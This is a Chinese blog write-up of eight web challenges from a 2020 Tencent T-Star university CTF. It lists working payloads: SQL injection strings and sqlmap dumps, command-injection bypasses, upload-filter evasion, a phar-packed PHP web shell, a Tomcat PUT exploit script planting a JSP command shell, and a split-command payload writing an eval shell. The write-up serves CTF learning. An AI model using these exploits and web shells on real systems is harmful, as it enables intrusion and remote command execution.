腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

博主： h3110w0r1d
发布时间：2020 年 06 月 30 日
1304 次浏览
暂无评论
1396字数
分类： WriteUp

QUST-SEC战队WRITEUP

最后两个SQL注入没有

题目一签到

操作内容

前端过滤 Burp抓包修改即可

蚁剑连接，在/var/www目录下找到了flag

key{K735c9f0D7ddc3b9}

题目二命令执行基础

操作内容

尝试执行127.0.0.1;ls，发现过滤了;，用%0a(换行符)代替
输入127.0.0.1%0als ../
发现key.php，
再输入127.0.0.1%0acat ../key.php
得到flag

flag{usderhky}

题目三你能爆破吗

操作内容

根据提示得知是cookie注入，查看cookie发现经过了base64编码
用order by判断查询字段数，为4时输出为空，可以得知查询了3个字段，
admin" order by 4 limit 0,1#

用以下语句注出库名
ad6min" union select database(),1,1 limit 0,1#

爆出security库下的表名
ad6min" union select group_concat(table_name),1,1 from information_schema.tables where table_schema='security' limit 0,1#

发现flag表，爆字段名
ad6min" union select group_concat(column_name),1,1 from information_schema.columns where table_name='flag' limit 0,1#

读flag
ad6min" union select group_concat(flag),1,1 from security.flag where 1=1 limit 0,1#

flag{a405ef895ef46d96}

题目四文件上传

操作内容

抓包尝试上传一句话，经过fuzz发现后缀过滤了php、php4、php5、phtml，文件内容也存在过滤，过滤了php、eval等关键词，还有文件大小限制，必须大于20kb。
用0补到20kb，最终用pht后缀，用assert代替eval，大小写绕过php的替换，上传成功

用蚁剑连接得到flag

flag{Aa3c7c37508E40B3}

题目五文件包含GetShell

操作内容

在html注释中发现lfi.txt，打开后得到lfi.php的源码，后缀名只能包含php。尝试phar文件包含
在本地生成一个包含shell的phar文件，重命名为xxx.txt上传到服务器上

<?php
$p = new Phar("my.phar", 0, 'my.phar');
$p->startBuffering();
$p['shell.php'] = '<?php system($_GET["x"]) ?>';
$p->setStub("<?php
    Phar::mapPhar('myphar.phar'); 
__HALT_COMPILER();");
$p->stopBuffering();
?>

执行ls发现flag.php，读取flag
http://afc114b2.yunyansec.com/lfi.php?file=phar://files/yUGMQyiG0Hmj3eO7.txt/shell&x=cat flag.php

flag{weisuohenzhongyao}

题目六成绩单

操作内容

用burp抓包，将包保存为sql.txt，
执行sqlmap -r sql.txt --current-db得到数据库名web1

sqlmap -r sql.txt -D web1 –tables 得到表名，发现fl4g表

sqlmap -r sql.txt -D web1 -T fl4g --dump 得到flag

flag{Sql_INJECT0N_4813drd8hz4}

题目七小猫咪踩灯泡

操作内容：

根据题目提示，搜索得到该漏洞的poc

#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'
except Exception,e:
    print 'Error:', e

运行脚本得到shell

http://28a256cd.yunyansec.com/1593507883.jsp?&pwd=023&cmd=ls
得到根目录文件列表，发现flag.txt

http://28a256cd.yunyansec.com/1593507883.jsp?&pwd=023&cmd=cat flag.txt
得到flag

flag{54e47be053bf6ea1}

题目八分析代码获得flag

操作内容

题目限制了命令的长度，linux中>xx可以直接生成一个xx名称的文件，可以利用这个将命令分开，最后再用ls -t>a命令将文件名列表保存到a中，
为了避免一些特殊字符，将一句话base64编码
<?php eval($_GET[1]);编码后为PD9waHAgZXZhbCgkX0dFVFsxXSk7
最终要执行的是echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php
将命令分开，因为ls -t是按照时间先后排序的，所以要反着写，结尾\是转义相当于一个\

hp
1.p\\
d\>\\
\ -\\
e64\\
bas\\
7\|\\
XSk\\
Fsx\\
dFV\\
kX0\\
bCg\\
XZh\\
AgZ\\
waH\\
PD9\\
o\ \\
ech\\

但是想要将文件列表保存到文件需要执行ls -t>q，这个命令7个字符，所以先要构造出这个命令。用以下命令得到可以执行ls -t>q命令的文件a

>-t\\
>\>q
>l\\
>s\ \\
ls>a
ls>>a

所以最终payload为

>-t\\
>\>q
>l\\
>s\ \\
ls>a
ls>>a
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
sh a
sh q

python脚本

import requests
url1 = "题目地址/?1="
with open("payload.txt","r") as f:
    for i in f:
        url = url1 + i.strip()
        requests.get(url)

执行完之后便在网站目录下生成了1.php，读取flag

flag{a1c8BFF2}

最后修改：2020 年 09 月 29 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱

地址

腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

h3110w0r1d • 2020 年 06 月 30 日

<h1>QUST-SEC战队WRITEUP</h1><p>最后两个SQL注入没有</p><h2>题目一 签到</h2><h3>操作内容</h3><p>前端过滤 Burp抓包修改即可<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="burp抓包" title="burp抓包" style=""data-original="/usr/uploads/2020/06/233732505.png"><br>蚁剑连接，在/var/www目录下找到了flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3614954172.png"></p><pre><code class="lang-flag">key{K735c9f0D7ddc3b9}</code></pre><h2>题目二 命令执行基础</h2><h3>操作内容</h3><p>尝试执行127.0.0.1;ls，发现过滤了;，用%0a(换行符)代替<br>输入127.0.0.1%0als ../<br>发现key.php，<br>再输入127.0.0.1%0acat ../key.php<br>得到flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/2787507899.png"></p><pre><code class="lang-flag">flag{usderhky}</code></pre><h2>题目三 你能爆破吗</h2><h3>操作内容</h3><p>根据提示得知是cookie注入，查看cookie发现经过了base64编码<br>用order by判断查询字段数，为4时输出为空，可以得知查询了3个字段，<br><code>admin&quot; order by 4 limit 0,1#</code></p><p>用以下语句注出库名<br><code>ad6min&quot; union select database(),1,1 limit 0,1#</code><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/1955616872.png"><br>爆出security库下的表名<br><code>ad6min&quot; union select group_concat(table_name),1,1 from information_schema.tables where table_schema=&#039;security&#039; limit 0,1#</code><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/1068307891.png"><br>发现flag表，爆字段名<br><code>ad6min&quot; union select group_concat(column_name),1,1 from information_schema.columns where table_name=&#039;flag&#039; limit 0,1#</code><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/2344582025.png"><br>读flag<br><code>ad6min&quot; union select group_concat(flag),1,1 from security.flag where 1=1 limit 0,1#</code><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/369354818.png"></p><pre><code class="lang-flag">flag{a405ef895ef46d96}</code></pre><h2>题目四 文件上传</h2><h3>操作内容</h3><p>抓包尝试上传一句话，经过fuzz发现后缀过滤了php、php4、php5、phtml，文件内容也存在过滤，过滤了php、eval等关键词，还有文件大小限制，必须大于20kb。<br>用0补到20kb，最终用pht后缀，用assert代替eval，大小写绕过php的替换，上传成功<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/1870023183.png"><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/4095464736.png"><br>用蚁剑连接得到flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/1122379477.png"></p><pre><code class="lang-flag">flag{Aa3c7c37508E40B3}</code></pre><h2>题目五 文件包含GetShell</h2><h3>操作内容</h3><p>在html注释中发现lfi.txt，打开后得到lfi.php的源码，后缀名只能包含php。尝试phar文件包含<br>在本地生成一个包含shell的phar文件，重命名为xxx.txt上传到服务器上</p><pre><code class="lang-php">&lt;?php
$p = new Phar(&quot;my.phar&quot;, 0, &#039;my.phar&#039;);
$p-&gt;startBuffering();
$p[&#039;shell.php&#039;] = &#039;&lt;?php system($_GET[&quot;x&quot;]) ?&gt;&#039;;
$p-&gt;setStub(&quot;&lt;?php
    Phar::mapPhar(&#039;myphar.phar&#039;); 
__HALT_COMPILER();&quot;);
$p-&gt;stopBuffering();
?&gt;</code></pre><p><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3361138441.png"><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3969081678.png"><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3706923844.png"><br>执行ls发现flag.php，读取flag<br><code>http://afc114b2.yunyansec.com/lfi.php?file=phar://files/yUGMQyiG0Hmj3eO7.txt/shell&amp;x=cat flag.php</code><br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/718466612.png"></p><pre><code class="lang-flag">flag{weisuohenzhongyao}</code></pre><h2>题目六 成绩单</h2><h3>操作内容</h3><p>用burp抓包，将包保存为sql.txt，<br>执行sqlmap -r sql.txt --current-db得到数据库名web1<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/1191380359.png"><br>sqlmap -r sql.txt -D web1 –tables 得到表名，发现fl4g表<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3121912591.png"><br>sqlmap -r sql.txt -D web1 -T fl4g --dump 得到flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/3746298255.png"></p><pre><code class="lang-flag">flag{Sql_INJECT0N_4813drd8hz4}</code></pre><h2>题目七 小猫咪踩灯泡</h2><h3>操作内容：</h3><p>根据题目提示，搜索得到该漏洞的poc</p><pre><code class="lang-python">#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = &#039;&#039;&#039;&lt;%@ page language=&quot;java&quot; import=&quot;java.util.*,java.io.*&quot; pageEncoding=&quot;UTF-8&quot;%&gt;&lt;%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+&quot;\\n&quot;);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%&gt;&lt;%if(&quot;023&quot;.equals(request.getParameter(&quot;pwd&quot;))&amp;&amp;!&quot;&quot;.equals(request.getParameter(&quot;cmd&quot;))){out.println(&quot;&lt;pre&gt;&quot;+excuteCmd(request.getParameter(&quot;cmd&quot;))+&quot;&lt;/pre&gt;&quot;);}else{out.println(&quot;:-)&quot;);}%&gt;&#039;&#039;&#039;
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method=&#039;OPTIONS&#039;, url=&#039;/ffffzz&#039;)
    headers = dict(conn.getresponse().getheaders())
    if &#039;allow&#039; in headers and \
       headers[&#039;allow&#039;].find(&#039;PUT&#039;) &gt; 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = &quot;/&quot; + str(int(time.time()))+&#039;.jsp/&#039;
        #url = &quot;/&quot; + str(int(time.time()))+&#039;.jsp::$DATA&#039;
        conn.request( method=&#039;PUT&#039;, url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print &#039;shell:&#039;, &#039;http://&#039; + sys.argv[1] + url[:-7]
            print &#039;shell:&#039;, &#039;http://&#039; + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print &#039;file exists&#039;
        else:
            print &#039;error&#039;
        conn.close()
    else:
        print &#039;Server not vulnerable&#039;
except Exception,e:
    print &#039;Error:&#039;, e</code></pre><p>运行脚本得到shell<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/4215131119.png"><br><code>http://28a256cd.yunyansec.com/1593507883.jsp?&amp;pwd=023&amp;cmd=ls</code><br>得到根目录文件列表，发现flag.txt<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/4083066432.png"><br><code>http://28a256cd.yunyansec.com/1593507883.jsp?&amp;pwd=023&amp;cmd=cat flag.txt</code><br>得到flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/2201651664.png"></p><pre><code class="lang-flag">flag{54e47be053bf6ea1}</code></pre><h2>题目八 分析代码获得flag</h2><h3>操作内容</h3><p>题目限制了命令的长度，linux中&gt;xx可以直接生成一个xx名称的文件，可以利用这个将命令分开，最后再用ls -t&gt;a命令将文件名列表保存到a中，<br>为了避免一些特殊字符，将一句话base64编码<br>&lt;?php eval($_GET[1]);编码后为PD9waHAgZXZhbCgkX0dFVFsxXSk7<br>最终要执行的是echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d&gt;1.php<br>将命令分开，因为ls -t是按照时间先后排序的，所以要反着写，结尾\是转义 相当于一个\</p><pre><code class="lang-text">hp
1.p\\
d\&gt;\\
\ -\\
e64\\
bas\\
7\|\\
XSk\\
Fsx\\
dFV\\
kX0\\
bCg\\
XZh\\
AgZ\\
waH\\
PD9\\
o\ \\
ech\\</code></pre><p>但是想要将文件列表保存到文件需要执行<code>ls -t&gt;q</code>，这个命令7个字符，所以先要构造出这个命令。用以下命令得到可以执行<code>ls -t&gt;q</code>命令的文件a</p><pre><code class="lang-text">&gt;-t\\
&gt;\&gt;q
&gt;l\\
&gt;s\ \\
ls&gt;a
ls&gt;&gt;a</code></pre><p>所以最终payload为</p><pre><code class="lang-payload">&gt;-t\\
&gt;\&gt;q
&gt;l\\
&gt;s\ \\
ls&gt;a
ls&gt;&gt;a
&gt;hp
&gt;1.p\\
&gt;d\&gt;\\
&gt;\ -\\
&gt;e64\\
&gt;bas\\
&gt;7\|\\
&gt;XSk\\
&gt;Fsx\\
&gt;dFV\\
&gt;kX0\\
&gt;bCg\\
&gt;XZh\\
&gt;AgZ\\
&gt;waH\\
&gt;PD9\\
&gt;o\ \\
&gt;ech\\
sh a
sh q</code></pre><p>python脚本</p><pre><code class="lang-python">import requests
url1 = &quot;题目地址/?1=&quot;
with open(&quot;payload.txt&quot;,&quot;r&quot;) as f:
    for i in f:
        url = url1 + i.strip()
        requests.get(url)
</code></pre><p>执行完之后便在网站目录下生成了1.php，读取flag<br><img src="https://h3110w0r1d.com/usr/themes/handsome/assets/img/loading.svg" alt="66.png" title="66.png" style=""data-original="/usr/uploads/2020/06/489162983.png"></p><pre><code class="lang-flag">flag{a1c8BFF2}</code></pre>

腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

QUST-SEC战队WRITEUP

题目一签到

操作内容

题目二命令执行基础

操作内容

题目三你能爆破吗

操作内容

题目四文件上传

操作内容

题目五文件包含GetShell

操作内容

题目六成绩单

操作内容

题目七小猫咪踩灯泡

操作内容：

题目八分析代码获得flag

操作内容

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Python3 修复PNG图片的宽高 CRC爆破

CTF MISC杂项总结

2020新春战疫 MISC 套娃 WriteUp

攻防世界 jpg RCTF-2015

攻防世界 stage1

攻防世界 miscmisc

解决浏览器自动填充后input背景变为黄色

攻防世界适合作为桌面

攻防世界信号不好先挂了

将Windows控制台字体设置为DejaVu Sans Mono+微软雅黑

腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

QUST-SEC战队WRITEUP

题目一 签到

操作内容

题目二 命令执行基础

操作内容

题目三 你能爆破吗

操作内容

题目四 文件上传

操作内容

题目五 文件包含GetShell

操作内容

题目六 成绩单

操作内容

题目七 小猫咪踩灯泡

操作内容：

题目八 分析代码获得flag

操作内容

发表评论 取消回复 本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

题目一签到

题目二命令执行基础

题目三你能爆破吗

题目四文件上传

题目五文件包含GetShell

题目六成绩单

题目七小猫咪踩灯泡

题目八分析代码获得flag

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款